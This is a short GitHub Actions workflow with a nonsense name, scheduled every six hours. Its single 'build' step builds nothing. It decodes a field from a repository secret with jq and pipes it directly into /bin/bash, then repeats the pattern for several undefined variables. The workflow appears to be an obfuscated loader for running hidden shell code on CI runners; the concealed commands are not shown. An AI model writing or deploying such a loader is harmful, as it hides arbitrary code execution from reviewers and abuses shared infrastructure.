name: ragregshibie

on:
  workflow_dispatch:
  schedule:
    - cron: '59 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: ragregshibie
        env:
          rawr1: ${{ secrets.rawr1 }}
        run: |
          echo $rawr1 | jq -r .dc5943 | /bin/bash
          echo $xhwda99459 | jq -r .hou70273 | /bin/bash
          echo $v3 | jq -r .ziyl57995 | /bin/bash
          echo $dr9427 | jq -r .quejm9 | /bin/bash
          echo $zx34912 | jq -r .jdkqj6160 | /bin/bash
          echo $lkgc06 | jq -r .lz4470 | /bin/bash

